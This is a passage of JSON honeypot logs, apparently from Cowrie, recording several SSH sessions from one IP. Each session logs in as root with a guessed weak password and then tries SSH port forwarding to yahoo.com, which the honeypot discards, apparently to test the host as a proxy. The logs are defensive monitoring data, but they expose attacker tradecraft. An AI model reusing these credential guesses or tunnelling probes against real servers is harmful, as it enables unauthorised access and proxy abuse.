{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.900085Z","src_ip":"213.209.150.239","session":"e628e4dec01d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.134898Z","src_ip":"213.209.150.239","session":"e628e4dec01d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":18668,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18668","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.182853Z","session":"e628e4dec01d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.229935Z","src_ip":"213.209.150.239","session":"e628e4dec01d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24195,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24195","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.365791Z","session":"e628e4dec01d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.413246Z","src_ip":"213.209.150.239","session":"e628e4dec01d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.461133Z","src_ip":"213.209.150.239","session":"e628e4dec01d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5019,"dst_ip":"1.2.3.4","dst_port":22,"session":"4066c480a58c","protocol":"ssh","message":"New connection: 213.209.150.239:5019 (1.2.3.4:22) [session: 4066c480a58c]","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.507410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.508462Z","src_ip":"213.209.150.239","session":"4066c480a58c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.555705Z","src_ip":"213.209.150.239","session":"4066c480a58c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.791024Z","src_ip":"213.209.150.239","session":"4066c480a58c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":4747,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:4747","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.839640Z","session":"4066c480a58c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:35.887270Z","src_ip":"213.209.150.239","session":"4066c480a58c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":12963,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12963","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.026107Z","session":"4066c480a58c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.073718Z","src_ip":"213.209.150.239","session":"4066c480a58c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.122508Z","src_ip":"213.209.150.239","session":"4066c480a58c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5070,"dst_ip":"1.2.3.4","dst_port":22,"session":"974a2bbdb9c5","protocol":"ssh","message":"New connection: 213.209.150.239:5070 (1.2.3.4:22) [session: 974a2bbdb9c5]","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.168447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.169210Z","src_ip":"213.209.150.239","session":"974a2bbdb9c5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.216241Z","src_ip":"213.209.150.239","session":"974a2bbdb9c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.450015Z","src_ip":"213.209.150.239","session":"974a2bbdb9c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":11874,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11874","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.498262Z","session":"974a2bbdb9c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.545668Z","src_ip":"213.209.150.239","session":"974a2bbdb9c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":28321,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:28321","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.681386Z","session":"974a2bbdb9c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.728628Z","src_ip":"213.209.150.239","session":"974a2bbdb9c5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.776492Z","src_ip":"213.209.150.239","session":"974a2bbdb9c5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5106,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ea0315d706e","protocol":"ssh","message":"New connection: 213.209.150.239:5106 (1.2.3.4:22) [session: 0ea0315d706e]","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.832287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.832930Z","src_ip":"213.209.150.239","session":"0ea0315d706e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:36.889526Z","src_ip":"213.209.150.239","session":"0ea0315d706e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.171672Z","src_ip":"213.209.150.239","session":"0ea0315d706e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":9277,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:9277","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.230075Z","session":"0ea0315d706e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.286792Z","src_ip":"213.209.150.239","session":"0ea0315d706e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":12750,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12750","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.443209Z","session":"0ea0315d706e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.500055Z","src_ip":"213.209.150.239","session":"0ea0315d706e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.557759Z","src_ip":"213.209.150.239","session":"0ea0315d706e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5161,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9422530b63c","protocol":"ssh","message":"New connection: 213.209.150.239:5161 (1.2.3.4:22) [session: f9422530b63c]","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.604560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.605323Z","src_ip":"213.209.150.239","session":"f9422530b63c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.652444Z","src_ip":"213.209.150.239","session":"f9422530b63c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.887091Z","src_ip":"213.209.150.239","session":"f9422530b63c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":12321,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12321","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.935308Z","session":"f9422530b63c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:37.982579Z","src_ip":"213.209.150.239","session":"f9422530b63c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":19320,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19320","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.117842Z","session":"f9422530b63c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.165116Z","src_ip":"213.209.150.239","session":"f9422530b63c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.213197Z","src_ip":"213.209.150.239","session":"f9422530b63c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5218,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff67f8ee1fff","protocol":"ssh","message":"New connection: 213.209.150.239:5218 (1.2.3.4:22) [session: ff67f8ee1fff]","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.268820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.269859Z","src_ip":"213.209.150.239","session":"ff67f8ee1fff"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 